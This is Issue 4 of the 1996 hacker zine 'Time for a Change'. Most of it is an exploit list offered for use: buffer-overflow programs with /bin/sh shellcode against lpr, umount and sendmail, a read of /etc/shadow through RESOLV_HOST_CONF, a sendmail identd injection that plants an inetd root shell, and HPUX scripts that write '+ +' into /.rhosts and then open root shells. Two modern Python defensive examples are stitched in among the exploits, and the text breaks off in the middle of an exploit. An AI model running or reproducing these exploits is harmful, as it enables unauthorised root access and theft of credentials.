Time for a Change Issue 4
Taking Your Machine
Presents
-+-+-=====================================================================-+-+-
______________________ ______________ _______________
/ / / / / /|
/ / / / / / |
/______________________ / /______________ / /______________ / |
| | | | | | |
| | | | | | /
| | | _______|/| | /
|_______ _______|/| |/_____ / | _______|/____
| | | | | | | / /|
| | | | | | | / / |
| | | | ______|/ | |/______ / |
| | | | | | | | |
| | | | | | | | |
| | / | | / | | /
| | / | | / | | /
|_______|/ |_______|/ |_______________|/
[ Time For a Change ]
Issue 4 11/19/96
--------------------------_______________________-------------------------
INTRODUCTION
____________
Once again we are delayed in releasing the latest issue. For various
reasons I have been totally uninvolved in the scene for the better part of
a year, and have had little motivation to release this issue. Recently,
however, I have (seemingly out of nowhere) been receiving a lot of mail
asking about issue 4: whether it exists, where to get it, etc., along with a
lot of positive feedback on previous issues. It is for this reason (once again)
that I have broken out the old text editor to issue forth (at least) one more
release of TFC.
If you like TFC, drop me a line. I will keep making it if people are
reading it. If you have written (or can write) something that would be of
interest to readers of TFC, send it along as well. The more quality
submissions I get, the more frequently I can release TFC.
In this issue, I am bringing you the newest installment of the bug list,
Rush2 brings to light some things that can be done on Livingston
Portmasters, Caliban tells us how to forcibly remove automobiles, and
Orestes gives us an in-depth look at Westinghouse's WSS5010 home/office
security systems. van Hauser also gives us a view of CCITT#7 monitoring
systems, specifically Hewlett Packard's acceSS 7 fraud detection system.
Send submissions, ideas, questions, complaints and such things to:
gitm@insecurity.org
gitm@command.com.inter.net
DO NOT TRY:
bf130@freenet.hsc.colorado.edu
or at freenet.uchsc.edu
Unfortunately, the Denver Freenet has implemented some lame id verification
system which includes all previously existing accounts. So the most stable
mail-drop I've ever had is no more.
BE SURE TO ENCRYPT ALL DATA SENT TO ME.
And extra special thanks go to all of you who wrote us with your compliments.
It is because of your praise that this issue exists.
--------------------------_______________________-------------------------
[ INDEX ]
Editorial: Hacking For the Fed........................By: Ghost in the Machine
1. Letters from people................................By: Ghost in the Machine
2. UNIX problems, for fun and exploit Vol.3...........By: Ghost in the Machine
3. Livingston Portmaster Fun..........................By: Rush 2
4. Wisdom from the Repo Man: How to steal cars........By: Caliban
5. Using, Programming, and Defeating the WSS5010......By: Orestes
6. CCiTT #7 Monitoring................................By: van Hauser
7. Reviews, and miscellany............................By: Various
-----------------------------------------------------------------------------
TYM - [ A TYM PRODUCTION ] - TYM
-----------------------------------------------------------------------------
Greets:
Terminal - Hope you enjoyed your summer with TNo.
Radikahl - For downright refusing to write an article.
van Hauser - Viel Spass mit dem Magazin!
DeMoNiKa - "I NEED UNIX NOW!"
Route - Quit being so oversensitive. Phrack sucked before you
took it over. 49 was the first one worth reading in a
long time.
The entire 916 NPA - Someday maybe someone with a clue will move there.
Orestes - And you didn't think there'd ever be another TFC.
POOP - We don't phear you!
x0x - Here it is, quit pestering me now!
not to forget such cool personalities as: davesob, drfonk, all the boys at
THC, sarlo, bane, asriel, one, elastic, foo, sigurd the volsung, erekose,
terminus, gatekeeper, deathseer, jedi, and all the cool people I may have
forgotten to mention.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
TFC Issue 4 Editorial
Hacking For the Fed
by - Ghost in the Machine
I am noticing a disturbing trend in the scene as it were, that people (even
people with minimal knowledge of hacking) are moving into data security as
a career. This normally wouldn't be a big issue, since it appears to be
the natural progression along the lifespan of a hacker. Defending systems
from hackers can be as interesting as hacking itself, given certain
situations. The problem arises when that is NOT what is being done, when
hackers are going to work for FEDERALLY CONTRACTED agencies, and not to
protect systems, but to develop bugs and security procedures for the
big businesses and government. This is wrong.
What is worse is that other people in the scene know and accept this as a
'cool' thing. Maybe I slept through some part of the last 10 years and
missed a critical moment in the history of hacking, but last time I checked
hacking for money was considered to be in poor taste, let alone hacking for
Big Brother.
There really isn't that much more to say about this issue, but I wanted to
make people aware of what is going on. Hacking for the NSA or some gigantic
company is not a cool career move, it is selling out. If you are in a career
like this, know that you are OWNED by the man forevermore. If you are not,
and know someone who is, let them know they are selling out their own
people.
gitm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change Presents
Letters from People
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> From: mutter@openix.com (Mutter)
>
>
>
> Greetings!
> I've read the first 3 Time For a Changes and they certainly are
> interesting. I like it. What I found especially interesting in the 3rd
> issue was your commentary about 2600 and your story about how you were
> essentially not allowed to call yourself a 2600 meeting because of
> something as trivial as a time. I mean as long as people are exchanging
> information and having a good time who really cares what time the meeting
> is at? Well, I really shouldn't be taking judgement as I'm sure Emmanuel
> has his own side as to why he won't just let you become "official".
> This was an extremely interesting editorial. 2600 has a big following and
> it took a lot of guts to tell it like you see it.
> I, myself, have recently started a small hardcopy publication dedicated to
> discussing information on and surrounding
> hacking/phreaking/scanners/electronic privacy and such. It's called root
> zine and people can get a sample copy by sending $2 (out of the US:
> $2.50) to:
> root zine
> PO Box 1178
> Maplewood, NJ
> 07040
> I'm just trying to get the word out about it now. If you can help by
> including the info in your next issue it would be greatly appreciated.
> We're no 2600 (decide for yourself whether this should be taken as a
> negative or positive statement). I think your readers would find it
> interesting. Info about root zine can also be found at
> http://www.openix.com/~mutter
> thanks.
Just for the record, we still call the meetings 2600, we on occasion tack
on 'unaffiliated' to make our point more clear, but, as Intel found out,
one cannot copyright a number. But all in all, I am glad you enjoyed the
article. It's nice to occasionally stir up some dust when 'pro-hacker'
people decide they want to be cast for the part of big brother themselves.
As for your magazine, I have not yet ordered my copy, so this ad will have
to suffice for this issue. Look for 'root zine' in the review section of
TFC #5.
Happy Hacking,
gitm
-----------------------------------------------
> From: SSUH@bipsy.se.bel.alcatel.be ("Suhaimi b. Samsudin")
> Cc: adam@mathcs11.haifa.ac.il
>
> Hi,
>
> I can't find the text TYM (Taking Your Machine) TFCs (Time for a change)
> document in neither ftp.netcom.com nor ftp.infonexus.com (maybe I missed
> it). I have only until Issue 3.
>
> Does anybody also know where I can find tips on "exploring" (or
> exploiting) VMS?
>
> Thanks, and sorry for the stupid questions.
>
The only place I am certain of that is carrying TFC at the moment is
ftp.infonexus.com. And there have been no issues (until now) of TFC since
#3. We will be picking up the pace a bit and hopefully it won't be another
year until the next issue.
Also, in the near future, you will be able to find tfc at insecurity.com.
Enjoy!
gitm
> From: khelbin@connix.com (Khelbin Sunvold)
>
>
> Where can I consistently find TFC? ..do you have an ftp site or a
> mailing list?
You could consistently find TFC if it were consistently released. But about
the mailing list, mail gitm@command.com.inter.net and ask to be added to the
TFC mailing list.
gitm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change
presents
UNIX problems, for fun and exploit. Volume 3.
(or how to get root in less than 5 minutes.)
by
Ghost in the Machine
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Yet another installment of the TFC buglist. You will find this issue has a
bit more current stuff. I am also going to omit walkthroughs for the remainder
of this series. I think that most of you will be able to figure out how to use
these. And if you cannot, you probably should learn a bit more unix before
playing with root toys.
Too many people bitched that all I released was really old bugs. Well, you
will find comparatively recent stuff here now, including Sendmail 8.7.5 and
for the first time anywhere, Colonel Mustard's IRIX/NIS bug. And in a last
minute effort, I am also including a rooting exploit for Sendmail 8.8.2 which
was released publicly as this issue went to press.
Known Credits:
Scriptors of DOOM - All HPUX bugs in this issue
Colonel Mustard - IRIX NIS bug
snocrash - Sendmail 8.6.10
mudge - Sendmail 8.6.12, 8.7.5
The rest I either have no idea who wrote them, or released them, or
whatever.
To recap the bugs released in this series:
In the first issue:
    AIX tprof
    AIX shadow
    AIX froot
    BSD/ULTRIX symlinks
    Dynix Sendmail
    Dynix rsh
    HPUX chfn
    SunOS Sendmail decode
    *NIX tftp
    SunOS rdist IFS
    SunOS rdist buffer
    *NIX getpwent()
    Elm autoreply
    Smail debug
    Smail create/append
    Smail .forward
    SunOS expreserve
    SunOS Sendmail 5.2
    X11 Xserver
In the last issue:
    Linux wu-ftpd
    SunOS Sendmail 8.6.4
    Sendmail pre 8.6.9
    Unixware shl
    Linux vadmin
    Ultrix chroot
    SunOS xterm logging
    SunOS xterm root
In this issue:
    Linux rlogin
    Linux new lpr
    Linux libc/resolv
    Linux umount
    Linux suidperl
    Sendmail 8.6.9/10
    Sendmail 8.6.12
    Sendmail 8.7.5
    IRIX NIS
    HPUX swinstall
    HPUX ppl
    HPUX glance
    HPUX rw checkcore
    HPUX rw icontmpupdate
    HPUX ppl log
    Sendmail 8.8.2
Basically, here is an example for the format of the file:
<Type of OS, or *NIX for all> (vers) - <Type of bug/hole> - <Comments (if any)>
:
<Exploit>
+++++
<Next listing>
------------------------------------------------------------------------------
Linux (Slackware 3.1, Redhat 2.0-2.1) - rlogin bug - Same as old AIX bug
:
% rlogin haxored.net -l -froot
#
+++++
Linux (any with berkeley suid lpr) - r00t - gnu and improved lpr bug
:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <unistd.h>
#include <sys/types.h>  /* u_char */
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
+++++
Linux (libc.so older than 5.4.7) - read any file - grab that shadow!
Also requires ssh, ping, finger, and traceroute.. all must be suid 0.
(Note: Any of the following will work individually, you don't need all 4)
:
export RESOLV_HOST_CONF=/etc/shadow; ssh asdf
export RESOLV_HOST_CONF=/etc/shadow; ping asdf
export RESOLV_HOST_CONF=/etc/shadow; finger asdf
export RESOLV_HOST_CONF=/etc/shadow; traceroute asdf
+++++
Linux (umount 1.2 (found in util-linux2.5)) - root - Another nice root bug
:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <fcntl.h>
#include <sys/types.h>  /* u_char, u_long, u_int */
#include <sys/stat.h>
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
execl(PATH_MOUNT, "umount", buff, NULL);
}
+++++
Linux (Slackware 3.0) - suidperl - grab root with another bad perm problem
:
#!/usr/bin/perl -U
# root access on any SUID perl infected system......
# chmod 4755 this script and run it....
$ENV{PATH}="/bin:/usr/bin";
$>=0;$
+++++
*NIX Sendmail (8.6.9-8.6.10) - identd hack - execute commands
:
/* Sendmail 8.6.9 identd hack. -- SnoCrash [r00t] */
/* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */
/* Fixed some more so it can work on 8.6.10 -- 10/2/95 */
/* Final cleanup -- 10/4/95. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <gnu/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define OUTPUT_BUFFER 4096 /* Output and input, */
#define SOCKET_BUFFER 512 /* with which we must up-put */
void main(void)
{
struct fd_set fdesc; /* File descriptor structure */
char outbuf[OUTPUT_BUFFER]; /* Our output buffer */
char inbuf[SOCKET_BUFFER]; /* "" input "" */
/* Preparing to read incoming data, captain. */
FD_ZERO(&fdesc);
FD_SET(0, &fdesc);
/* Read it, Sulu! Now! */
if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)
exit(1);
FD_SET(0, &fdesc);
/* Now we send our instructions, under the guise of innocent
* ol' identd. I find this ironic, that identd, supposedly
* a standard that would help stop "evil hacker types", became
* part of one of the bigger holes to ever hit the net. Hmm.
* Ain't life funny that way sometimes? :)
*/
sprintf(outbuf, " \
%s : USERID : UNIX : Evil_Hacker_Type...Phear_Me. So, like.. here are \
my evil commands for you to execute so I can rox yer box. Check this out... \
\r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > \
/tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty \
fucking eleet, eh? Now I just have to sit here and babble so I can fill \
up your crappy buffer. So I bet youre wondering how this got here. Well \
lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \
8.6.12 has a whole load of different bugs, but this isnt one of them. \
Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \
weellll... it's been fun fucking with your box and all, but I really must \
be going, so I guess Ill see you around. Tell all your friends to be nice \
and leave the door open like you did. Thanks... its been real. \
funkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just too
funky.\r\n \
", inbuf);
write(1, outbuf, strlen(outbuf));
exit(0);
}
+++++
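A defender's counterpart to the identd trick above, as an added example (not code from the article or from sendmail): a strict parser for an ident reply that accepts exactly one clean CRLF-terminated line, so an embedded line break can never become a control line in whatever file the caller writes. The 512-byte cap and the sample replies are assumptions constructed for this example.

```python
"""Strict parser for an ident (RFC 1413 style) reply.

Added example, not code from the article or from sendmail.  The identd
trick above works because the mailer copied the remote daemon's reply into
a line-oriented control file, where an embedded CR/LF starts a new control
line.  A receiver that treats the reply as untrusted input must accept
exactly one clean, CRLF-terminated line and nothing else.
"""


class IdentReplyError(ValueError):
    """Raised for any reply that is not a single well-formed ident line."""


# Assumption of this example: cap the reply at the 512-byte buffer size the
# fake daemon above happens to use; the real limit is a local policy choice.
MAX_REPLY_LEN = 512


def _parse_port_pair(field):
    """'6191 , 25' -> (6191, 25); anything else is an error."""
    parts = [p.strip() for p in field.split(",")]
    if len(parts) != 2 or not all(p.isdigit() for p in parts):
        raise IdentReplyError("malformed port pair")
    ports = tuple(int(p) for p in parts)
    if not all(0 < p < 65536 for p in ports):
        raise IdentReplyError("port out of range")
    return ports


def parse_ident_reply(raw):
    """Parse one reply of the form
         port , port : USERID : opsys : userid      or
         port , port : ERROR : code
    and return a dict, or raise IdentReplyError.
    """
    if len(raw) > MAX_REPLY_LEN:
        raise IdentReplyError("reply too long")
    if not raw.endswith(b"\r\n"):
        raise IdentReplyError("reply not CRLF terminated")
    body = raw[:-2]
    # The check that defeats the injection: no CR, LF or other control
    # byte may survive inside the reply once the terminator is removed.
    if any(b < 0x20 or b == 0x7F for b in body):
        raise IdentReplyError("control character inside reply")
    try:
        text = body.decode("ascii")
    except UnicodeDecodeError:
        raise IdentReplyError("non-ASCII byte in reply") from None

    fields = text.split(":", 3)          # the userid may itself contain ':'
    if len(fields) < 3:
        raise IdentReplyError("too few fields")
    ports = _parse_port_pair(fields[0])
    kind = fields[1].strip().upper()
    if kind == "USERID":
        if len(fields) != 4:
            raise IdentReplyError("USERID reply needs opsys and userid")
        return {"ports": ports, "type": kind,
                "opsys": fields[2].strip(), "userid": fields[3].strip()}
    if kind == "ERROR":
        if len(fields) != 3:
            raise IdentReplyError("ERROR reply takes exactly one code")
        return {"ports": ports, "type": kind, "code": fields[2].strip()}
    raise IdentReplyError("unknown reply type %r" % kind)


def ident_header_value(raw):
    """The userid to record for this connection, or '' when the reply is
    rejected; a caller logging it never sees a second line."""
    try:
        reply = parse_ident_reply(raw)
    except IdentReplyError:
        return ""
    return reply.get("userid", "")


# Constructed samples: one honest reply, one error, one shaped like the
# exploit's (a second "line" hidden inside the userid field).
GOOD_REPLY = b"6191 , 25 : USERID : UNIX : alice\r\n"
ERROR_REPLY = b"6191 , 25 : ERROR : NO-USER\r\n"
EVIL_REPLY = (b"6191 , 25 : USERID : UNIX : Evil_Hacker_Type"
              b"\r\nCroot\r\nHReceived: bogus\r\n")

if __name__ == "__main__":
    for sample in (GOOD_REPLY, ERROR_REPLY, EVIL_REPLY):
        print(repr(sample[:40]), "->", repr(ident_header_value(sample)))
```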
*NIX Sendmail (8.6.12) - Buffer Overflow -
:
/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95 */
/* by following the above document you should be able to write */
/* buffer overflows for other OS's on other architectures now */
/* mudge@l0pht.com */
/* */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/
#include <syslog.h>
char buffer[4028];
void main () {
int i;
for(i=0; i<2024; i++)
buffer[i]=0x90;
/* should set eip to 0xc73c */
buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;
i=2028;
/* begin actual program */
buffer[i++]=0x89; /* movl %esp, %ebp */
buffer[i++]=0xe5;
buffer[i++]=0x33; /* xorl %eax,%eax */
buffer[i++]=0xc0;
buffer[i++]=0xeb; /* jmp ahead */
buffer[i++]=0x29;
buffer[i++]=0x5e; /* popl %esi */
buffer[i++]=0x59; /* popl %ecx */
buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xf5;
buffer[i++]=0x70;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x6a; /* pushl $0x0 */
buffer[i++]=0x00;
#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif
/* the above is what the disassembly of execute does... but we only
want to push /bin/sh to be executed... it looks like this leal
puts into eax the address where the arguments are going to be
passed. By pointing to 0xfffffffc(%ebp) we point to a null
and don't care about the args... could probably just load up
the first section movl $0x0,0xfffffff8(%ebp) with a null and
left this part the way it want's to be */
buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x50; /* pushl %eax */
buffer[i++]=0x68; /* pushl $0xc773 */
buffer[i++]=0x73;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x8d; /* lea 0x3b,%eax */
buffer[i++]=0x05;
buffer[i++]=0x3b;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x51; /* pushl %ecx */
buffer[i++]=0x9a; /* lcall 0x7,0x0 */
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;
buffer[i++]=0xe8; /* call back to ??? */
buffer[i++]=0xd2;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}
+++++
*NIX Sendmail (8.7.5) - Buffer Overflow - Newest sendmail exploit
:
# Hrm... and Eric Allman told me to my face that there were *no* buffer
# overflows in 8.7.5 -- .mudge
# This works on systems that have the chpass program runable by
# users. Tested on FreeBSD, though the vulnerability exists in all
# Sendmail8.7.5. Granted you need to be able to change your gecos field ;-)
#
# The problem is in buildfnam() which lives in util.c - it treats
# the static allocated array nbuf[MAXSIZE+1], from recipient.c, in
# an unbounded fashion.
#
# mudge@l0pht.com
CC=/usr/bin/gcc
RM=/bin/rm
cat > a_run.c << EOF
main(int argc, char *argv[])
{
long addr=0xefbfcea8;
char *ptr = (char *)&addr;
char foo[5];
int i, j;
if (argc != 2){
printf("Usage: %s offset\n", argv[0]);
exit(1);
}
addr += atoi(argv[1]);
printf("Full Name: CCCCCCCCCC");
if (atoi(argv[1])%2){
for(i=0; i<60; i++)
printf("AAAA");
}
else{
for(i=0; i<60; i++)
printf("BBBB");
}
for (i = 0; i< 5; i++){
printf("%c%c%c%c", *(ptr+2), *(ptr+3), *(ptr), *(ptr+1));
}
}
EOF
cat > make_gecos.c << EOF
#include <stdio.h>
main(int argc, char *argv[])
{
int i;
char mach_codes[] =
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
for (i=0; i<40; i++)
printf("%c", 0x90);
printf("%s", mach_codes);
}
EOF
$CC -o make_gecos make_gecos.c
if [ ! -x make_gecos ] ; then
echo failed to build make_asdf
exit 1
fi
$CC a_run.c
if [ ! -x a.out ] ; then
echo failed to build asdf
exit 1
fi
$RM a_run.c make_gecos.c
echo "1 - Change the variables in the sploit.sh script"
echo "2 - run make_gecos > tmpr"
echo "3 - setenv MANPATH=\"\`cat ./tmpr\`\" "
echo "4 - run the sploit.sh sploit.sh script with an argument"
echo " of around 3000"
# this argument varies depending upon what lives in ones
# environment variables, what the paths are, etc. etc.
# on a pretty stock environment in a FreeBSD setup I hit
# around 3900
sploit.sh:
#!/bin/sh
if [ $# = 1 ] ; then
i=$1
else
i=0
fi
FILE=/usr/home/username/wip/overflow/sendmail/ouch
TMP=/usr/home/username/wip/overflow/sendmail/cleanup
EDITOR=/usr/bin/ex
export EDITOR
while `[ $i -le 16048 ]`
do
# ./m3 ${i} > $FILE
# ./make_gecos ${i} > $FILE
./a.out ${i} > $FILE
chfn username << FOE
3 d
2 r ./ouch
wq!
FOE
sync
sync
echo "using arg of [0xefbfcea8 (hex) + ${i}(dec)]"
/usr/sbin/sendmail username
i=`expr $i + 1`
done
+++++
IRIX (tested on 5.2 and 6.2) - nis vulnerability - gain access
:
On IRIX systems running NIS, if an account in the /etc/passwd file is
unpassworded, you can get into it, even if it is disabled in the NIS passwd
file.
for example
$ cat /etc/passwd
reveals
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
...(etc)
and
$ ypcat passwd
gives you
lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
You can use "rsh machinename -l lp /bin/sh -i" to get a shell, or just telnet
to the machine and login as lp (if you feel like leaving more logs behind).
+++++
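The local-file-before-NIS behaviour described above, as an added checker (example code, not from the article or from IRIX): it reads a copy of /etc/passwd and of the ypcat output as text and lists accounts whose local password field is empty, noting whether the NIS map shows them locked. The sample records are constructed; only the lp line is modelled on the article.

```python
"""Flag local /etc/passwd entries that would bypass a NIS lock.

Added example, not from the TFC article or from IRIX.  On a host that
consults /etc/passwd before the NIS passwd map, an account with an EMPTY
local password field can be logged into even though the NIS map shows it
locked with '*'.  This check reads both sources as text and reports the
offending accounts, so an admin can see which NIS locks the local file
silently undoes.
"""

# Constructed sample input; the 'lp' record is modelled on the article.
LOCAL_PASSWD = """\
root:x:0:0:Super-User:/:/bin/sh
# comment line, ignored
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp::10:10:UUCP Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
guest:*:998:998:Guest Account:/usr/people/guest:/bin/csh
+::0:0:::
broken:line:without:enough
"""

# Constructed stand-in for `ypcat passwd` output.
NIS_PASSWD = """\
lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp:*:10:10:UUCP Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
guest:*:998:998:Guest Account:/usr/people/guest:/bin/csh
"""

LOCKED_PREFIXES = ("*", "!")   # conventional "no password can match" markers


def parse_passwd(text):
    """Return {login: password_field} for well-formed 7-field records.

    Comment lines and malformed lines are skipped.  NIS inclusion entries
    ('+', '-', '+@netgroup', '-user') are skipped too: they carry an empty
    password field by design and are not accounts, so they must not be
    reported as passwordless.
    """
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        login, pw_field = fields[0], fields[1]
        if login.startswith(("+", "-")):
            continue
        entries[login] = pw_field
    return entries


def is_locked(pw_field):
    """True when the field can never match a typed password."""
    return pw_field.startswith(LOCKED_PREFIXES)


def find_nis_bypass(local_text, nis_text):
    """Return [(login, nis_status)] for every passwordless local account.

    nis_status is 'locked' (NIS has it disabled, the local entry overrides
    that), 'unlocked' (NIS would also let it in) or 'absent' (local-only).
    """
    local = parse_passwd(local_text)
    nis = parse_passwd(nis_text)
    findings = []
    for login, pw_field in sorted(local.items()):
        if pw_field != "":
            continue
        if login not in nis:
            status = "absent"
        elif is_locked(nis[login]):
            status = "locked"
        else:
            status = "unlocked"
        findings.append((login, status))
    return findings


if __name__ == "__main__":
    for login, status in find_nis_bypass(LOCAL_PASSWD, NIS_PASSWD):
        print(f"{login}: empty local password, NIS entry {status}")
```

On a real host the two texts would come from reading /etc/passwd and capturing `ypcat passwd`; every line reported is an account the NIS administrator believes is disabled but which this machine will still admit.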
HPUX (9.X - 10.X) - swinstall bug - create any file on the system mode 666
:
#!/usr/bin/perl
# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it! -Salty 8/6/96
# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..
$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
print STDERR "I can only work on systems that have swinstall loaded..\n";
print STDERR "Yours doesn't seem to...\n";
exit;
};
if ($#ARGV<0) {
$newfile="/.rhosts";
} else {
$newfile="$ARGV[0]";
}
if (-f "$newfile") {
print STDERR "$newfile exists!\n";
print STDERR "I can only make files that don't already exist..\n";
exit;
}
open(UNAME,"uname -r|");
chop($uname=<UNAME>);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);
print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
system("remsh localhost -l root ksh -i");
} else {
system(">$newfile;ls -l $newfile");
}
+++++
HPUX (?-10.X) - ppl overflow - get root with rhosts
:
#!/bin/ksh
# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie
#HOST='localhost'
#USER=`whoami`
HOST="+"
USER="+"
cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i
+++++
HPUX - glance error - more root with rhosts
:
#!/bin/ksh
# exploit to work against the latest rev that I know of for glance+
# Tested on 9000/700.. Don't even know if it's available on 10.X
# You could've done this next week. .traz
if [ ! -x /usr/perf/bin/glance ]
then
echo 'No diablo programme.'
echo 'Que si como es que.'
exit
fi
PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
